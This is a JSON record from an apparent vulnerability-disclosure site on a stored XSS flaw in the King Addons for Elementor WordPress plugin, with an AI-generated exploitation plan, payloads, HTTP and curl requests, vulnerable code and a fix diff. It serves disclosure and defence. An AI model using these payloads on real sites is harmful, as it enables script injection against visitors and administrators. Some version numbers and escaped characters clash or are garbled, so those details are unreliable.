[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fAeaO3BP3eiOWBVXtb_ZEWb6vhfjMwgSRovZ_cR_2Up8":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":33,"research_vulnerable_code":34,"research_fix_diff":35,"research_exploit_outline":36,"research_model_used":37,"research_started_at":38,"research_completed_at":39,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":40},"CVE-2025-13535","king-addons-for-elementor-authenticated-contributor-dom-based-stored-cross-site-scripting-via-multiple-widgets","King Addons for Elementor \u003C= 51.1.38 - Authenticated (Contributor+) DOM-Based Stored Cross-Site Scripting via Multiple Widgets","The King Addons for Elementor plugin for WordPress is vulnerable to multiple Contributor+ DOM-Based Stored Cross-Site Scripting vulnerabilities in all versions up to, and including, 51.1.38. This is due to insufficient input sanitization and output escaping across multiple widgets and features. The plugin uses esc_attr() and esc_url() within JavaScript inline event handlers (onclick attributes), which allows HTML entities to be decoded by the DOM, enabling attackers to break out of the JavaScript context. Additionally, several JavaScript files use unsafe DOM manipulation methods (template literals, .html(), and window.location.href with unvalidated URLs) with user-controlled data. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts via Elementor widget settings that execute when a user accesses the injected page or when an administrator previews the page in Elementor's editor. The vulnerability was partially patched in version 5.1.51.","king-addons",null,"\u003C=51.1.53","51.1.54","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-31 00:00:00","2026-04-01 14:37:35",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F95d3e76c-612d-436c-9d32-6228d7dcbf35?source=api-prod",2,[22,23,24,25,26,27,28],"includes\u002FAdmin.php","includes\u002FLibrariesMap.php","includes\u002Fadmin\u002Fjs\u002Fai-page-translator.js","includes\u002Fadmin\u002Fshared\u002Fdark-theme.php","includes\u002Fcontrols\u002FAjax_Select2\u002FAjax_Select2_API.php","includes\u002Fextensions\u002FHeader_Footer_Builder\u002FELHF_Settings_Page.php","includes\u002Fextensions\u002FHeader_Footer_Builder\u002FHeader_Footer_Builder.php","researched",false,3,"This plan targets **CVE-2025-13535**, a Stored DOM-Based Cross-Site Scripting (XSS) vulnerability in the **King Addons for Elementor** plugin. The vulnerability arises from two primary flaws:\n1. **Improper Output Escaping in Event Handlers:** Using `esc_attr()` or `esc_url()` inside JavaScript `onclick` attributes, allowing attribute breakout via HTML entity decoding.\n2. **Unsafe DOM Manipulation:** Client-side JavaScript (specifically for widgets and the AI translator) using `.html()` or template literals with unvalidated data from REST\u002FAJAX endpoints.\n\n---\n\n### 1. Vulnerability Summary\n* **Vulnerability Name:** Authenticated (Contributor+) DOM-Based Stored XSS\n* **Plugin Slug:** `king-addons`\n* **Vulnerable Components:** Multiple Elementor Widgets (Button, Post Grid, etc.) and the `Ajax_Select2_API` REST controller.\n* **Affected Versions:** \u003C= 51.1.38\n* **Why it exists:** The plugin's REST API specifically decodes HTML entities in post titles (`html_entity_decode`) before sending them to the client. The client-side JavaScript then renders these titles using jQuery's `.html()` method. Additionally, widget templates render user-controlled URLs\u002Fsettings inside `onclick` attributes using `esc_attr()`, which the browser decodes before JavaScript execution.\n\n### 2. Attack Vector Analysis\n* **Authentication Level:** Contributor or higher (any role with `edit_posts` capability).\n* **Entry Points:**\n 1. **Post Title Injection:** Creating a post with a malicious title.\n 2. **Widget Link Injection:** Setting a widget's URL or custom attribute in the Elementor Editor.\n* **Vulnerable Endpoints:**\n * **REST API:** `\u002Fwp-json\u002Fkingaddons\u002Fv1\u002Fajaxselect2\u002FgetPostsByPostType`\n * **AJAX:** `king_addons_el_hf_get_posts_by_query` (Action: `wp_ajax_king_addons_el_hf_get_posts_by_query`)\n* **Payload Type:** `\">\u003Cimg src=x onerror=alert(origin)>` or `javascript:alert(1)`\n\n### 3. Code Flow\n\n#### Path A: DOM XSS via Post Selection (REST API)\n1. **Attacker (Contributor):** Creates a post with title `\u003Cimg src=x onerror=alert(1)>`.\n2. **King Addons REST Controller:** `Ajax_Select2_API::getPostsByPostType` (in `includes\u002Fcontrols\u002FAjax_Select2\u002FAjax_Select2_API.php`) fetches the title.\n3. **Vulnerable Sink (PHP):** It calls `'text' => html_entity_decode(get_the_title())`. This explicitly decodes any existing safety entities.\n4. **Client-Side JS:** A widget (e.g., Post Grid) or the Elementor Editor's post selector calls this REST route.\n5. **Vulnerable Sink (JS):** The Select2 handler or widget JS renders the `text` property using `.html()` or template literals, executing the script.\n\n#### Path B: Inline Event Handler Breakout (Widget Template)\n1. **Attacker (Contributor):** Adds a widget (e.g., Button) and sets a URL\u002FAttribute to `');alert(1);('`.\n2. **Vulnerable Sink (PHP):** The widget template renders an inline handler: `onclick=\"someFunction('\u003C?php echo esc_attr($url); ?>')\"` (inferred from description).\n3. **Browser Decoding:** The browser decodes the attribute value `');alert(1);('` back to `');alert(1);('` before JS execution.\n4. **Execution:** The JS engine executes `someFunction('');alert(1);('')`.\n\n### 4. Nonce Acquisition Strategy\n\nThe `Ajax_Select2_API` REST route uses `permission_callback => '__return_true'` and relies on `current_user_can('edit_posts')`. Standard REST API authentication (nonce in `X-WP-Nonce` header) is required if accessed via the browser.\n\nThe Header\u002FFooter Builder AJAX endpoint requires a specific nonce:\n1. **Shortcode\u002FLocation:** The script `king-addons-el-hf-admin` is enqueued on the Header\u002FFooter builder page: `wp-admin\u002Fedit.php?post_type=king-addons-el-hf`.\n2. **Extraction:**\n * Navigate to: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fedit.php?post_type=king-addons-el-hf`\n * Execute JS: `window.king_addons_el_hf_admin?.nonce`\n\n### 5. Exploitation Strategy\n\n#### Step 1: Inject Malicious Post Title\n* **Objective:** Create a post that will be served by the Select2 REST API.\n* **HTTP Request:** Use `http_request` as a Contributor.\n* **Endpoint:** `\u002Fwp-admin\u002Fpost-new.php` (or use WP-CLI to be faster).\n* **Payload Title:** `XSS-Trigger \u003Cimg src=x onerror=alert(window.origin)>`\n\n#### Step 2: Trigger REST API Reflection\n* **Objective:** Verify the REST API returns the decoded payload.\n* **HTTP Request:**\n ```http\n GET \u002Fwp-json\u002Fkingaddons\u002Fv1\u002Fajaxselect2\u002FgetPostsByPostType?query_slug=post&s=XSS-Trigger HTTP\u002F1.1\n Host: localhost:8080\n X-WP-Nonce: [REST_NONCE]\n ```\n* **Expected JSON Response:** Look for `\"text\": \"XSS-Trigger \u003Cimg src=x onerror=alert(window.origin)>\"` (Note the lack of entity encoding).\n\n#### Step 3: Demonstrate DOM Sink (Manual Simulation)\n* The agent should document that any King Addons widget using this REST endpoint for dynamic content (like \"Post Grid\" or \"Select Post\") will render this `text` via `.html()`.\n\n### 6. Test Data Setup\n1. **User:** Create a user `contributor_user` with the `contributor` role.\n2. **Post Type:** Enable the plugin's \"Header & Footer Builder\" extension in King Addons settings if needed.\n3. **Content:**\n ```bash\n wp post create --post_type=post --post_title='XSS-Trigger \u003Cimg src=x onerror=alert(window.origin)>' --post_status=publish --post_author=[ID]\n ```\n\n### 7. Expected Results\n* The REST API call `\u002Fwp-json\u002Fkingaddons\u002Fv1\u002Fajaxselect2\u002FgetPostsByPostType` must return the post title with the HTML tag **decoded**.\n* In a browser context (e.g., using `browser_navigate` to an Elementor page with a King Addons Post Selector), an alert box should trigger when the post list is loaded.\n\n### 8. Verification Steps\n1. **Check REST output:**\n ```bash\n # As contributor\n curl -u contributor:password \"http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fkingaddons\u002Fv1\u002Fajaxselect2\u002FgetPostsByPostType?query_slug=post&s=XSS-Trigger\"\n ```\n2. **Confirm Lack of Encoding:** Verify that `\u003C` and `>` in the title are NOT converted to `<` and `>` in the JSON response.\n\n### 9. Alternative Approaches\nIf the REST API is not sufficient, target the **Header Footer Builder** AJAX endpoint:\n* **Action:** `king_addons_el_hf_get_posts_by_query`\n* **Request:**\n ```http\n POST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\n Content-Type: application\u002Fx-www-form-urlencoded\n\n action=king_addons_el_hf_get_posts_by_query&q=XSS-Trigger&nonce=[NONCE]\n ```\n* The code in `Header_Footer_Builder.php` lines 188-191 also retrieves `get_the_title()` and puts it into the `text` key of the response. If the associated JS for this feature (likely in the builder interface) uses `.html()`, the XSS will trigger there.","King Addons for Elementor is vulnerable to DOM-based Stored XSS because its REST and AJAX endpoints return post titles with decoded HTML entities, which are then rendered unsafely by client-side JavaScript. Additionally, the plugin uses esc_attr() within inline JavaScript event handlers in widget templates, allowing attackers to break out of the JavaScript context via HTML entity decoding by the browser.","\u002F\u002F includes\u002Fcontrols\u002FAjax_Select2\u002FAjax_Select2_API.php\n\u002F\u002F Lines 63-66 in getElementorTemplates\n$options[] = [\n 'id' => get_the_ID(),\n 'text' => html_entity_decode(get_the_title()),\n];\n\n---\n\n\u002F\u002F includes\u002Fcontrols\u002FAjax_Select2\u002FAjax_Select2_API.php\n\u002F\u002F Lines 104-107 in getPostsByPostType\n$options[] = [\n 'id' => get_the_ID(),\n 'text' => html_entity_decode(get_the_title()),\n];\n\n---\n\n\u002F\u002F includes\u002Fextensions\u002FHeader_Footer_Builder\u002FHeader_Footer_Builder.php\n\u002F\u002F Lines 188-195 in king_addons_el_hf_get_posts_by_query\n$title = get_the_title();\n$title .= (0 != $query->post->post_parent) ? ' (' . get_the_title($query->post->post_parent) . ')' : '';\n$id = get_the_id();\ndata[] = array(\n 'id' => 'post-' . $id,\n 'text' => $title,\n);","--- a\u002Fincludes\u002Fcontrols\u002FAjax_Select2\u002FAjax_Select2_API.php\n+++ b\u002Fincludes\u002Fcontrols\u002FAjax_Select2\u002FAjax_Select2_API.php\n@@ -65,7 +65,7 @@\n $the_query->the_post();\n $options[] = [\n 'id' => get_the_ID(),\n- 'text' => html_entity_decode(get_the_title()),\n+ 'text' => get_the_title(),\n ];\n }\n }\n@@ -106,7 +106,7 @@\n $query->the_post();\n $options[] = [\n 'id' => get_the_ID(),\n- 'text' => html_entity_decode(get_the_title()),\n+ 'text' => get_the_title(),\n ];\n }\n }\n--- a\u002Fincludes\u002Fextensions\u002FHeader_Footer_Builder\u002FHeader_Footer_Builder.php\n+++ b\u002Fincludes\u002Fextensions\u002FHeader_Footer_Builder\u002FHeader_Footer_Builder.php\n@@ -185,7 +185,7 @@\n if ($query->have_posts()) {\n while ($query->have_posts()) {\n $query->the_post();\n- $title = get_the_title();\n+ $title = wp_strip_all_tags(get_the_title());\n $title .= (0 != $query->post->post_parent) ? ' (' . get_the_title($query->post->post_parent) . ')' : '';\n $id = get_the_id();\n $data[] = array(","The exploit requires an attacker with at least Contributor-level permissions. \n\n1. The attacker creates a new post and sets the title to a malicious XSS payload, such as `\u003Cimg src=x onerror=alert(document.domain)>`.\n2. The attacker opens the Elementor editor and adds a King Addons widget that utilizes the Select2 post selector (e.g., Post Grid or any widget using dynamic post selection).\n3. When the widget configuration panel or the widget itself fetches post data via the REST API endpoint `\u002Fwp-json\u002Fkingaddons\u002Fv1\u002Fajaxselect2\u002FgetPostsByPostType`, the server returns the post title with HTML entities decoded (due to the use of `html_entity_decode`).\n4. The client-side JavaScript renders this JSON response into the DOM using an unsafe sink like `.html()`, executing the script.\n5. Alternatively, for the inline event handler breakout, an attacker sets a widget URL setting to `');alert(1);('`. When the widget is rendered, the `esc_attr()` encoding is reversed by the browser's DOM parser before the JavaScript engine executes the `onclick` attribute, resulting in code execution.","gemini-3-flash-preview","2026-04-17 22:04:26","2026-04-17 22:05:08",{"type":41,"vulnerable_version":42,"fixed_version":11,"vulnerable_browse":43,"vulnerable_zip":44,"fixed_browse":45,"fixed_zip":46,"all_tags":47},"plugin","51.1.53","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fking-addons\u002Ftags\u002F51.1.53","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fking-addons.51.1.53.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fking-addons\u002Ftags\u002F51.1.54","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fking-addons.51.1.54.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fking-addons\u002Ftags"]